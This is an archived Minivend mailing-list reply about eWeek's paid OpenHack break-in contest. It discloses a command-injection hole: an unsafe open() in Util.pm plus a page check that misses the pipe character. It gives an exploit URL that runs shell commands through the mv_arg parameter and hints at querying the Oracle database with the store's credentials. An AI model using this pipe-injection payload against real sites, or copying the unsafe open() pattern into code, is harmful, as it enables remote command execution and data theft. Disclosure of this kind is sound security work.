[Date Prev][Date Next][Thread Prev][Thread Next][Minivend by date
][Minivend by thread
]
Re: HACKED [mv] eWeek using Minivend in our openhack project
****** message to minivend-users from Alexander Lazic <all@gmx.at> ******
hi,
> Since we are paying money if anyone can crack into the store ($1,500),
> it's possible that someone is going to go through the code looking for
> ways to exploit any holes. Other than the advice in the FAQ on "Is
> MiniVend secure" and in the "MiniVend Security" section of the manual,
are
> there any other security tips people can provide to keep our site locked
> down? Thanks very much.
there is a sec. hole in the minivend Util.pm - module
routine readfile at line 810:
--cut here---
return undef if ! open(READIN, $file);
--cut here---
... minivend file view_page.html:
---cut here---
[elsif session arg =~ /^\/|\.\./]
---cut here---
does no proper input validation checks (they forgot about the "|" :)
these two problems do allow http-request like:
https://www.openhack.com/cgi-bin/eweekorcl/view_page.html?mv_arg=|ls|
so anybody can execute "any" command with minivend`s permissions ..
/* with the ORACLE_USERID=minivend/hugepassword@orcl and sqlplus it should
be easy to execute queries on the oracle database
.. unfortunately the user minivend is not allowed to set
environment-variables .. due to lack of time we were not able to h
ave a closer look at this ... */
thats all
almei
--
Sent through GMX FreeMail - http://www.gmx.net
-
To unsubscribe from the list, DO NOT REPLY to this message. Instead, send
email with 'UNSUBSCRIBE minivend-users' in the body to Majordomo@minivend.com.
Archive of past messages: http://www.minivend.com/minivend/minivend-list
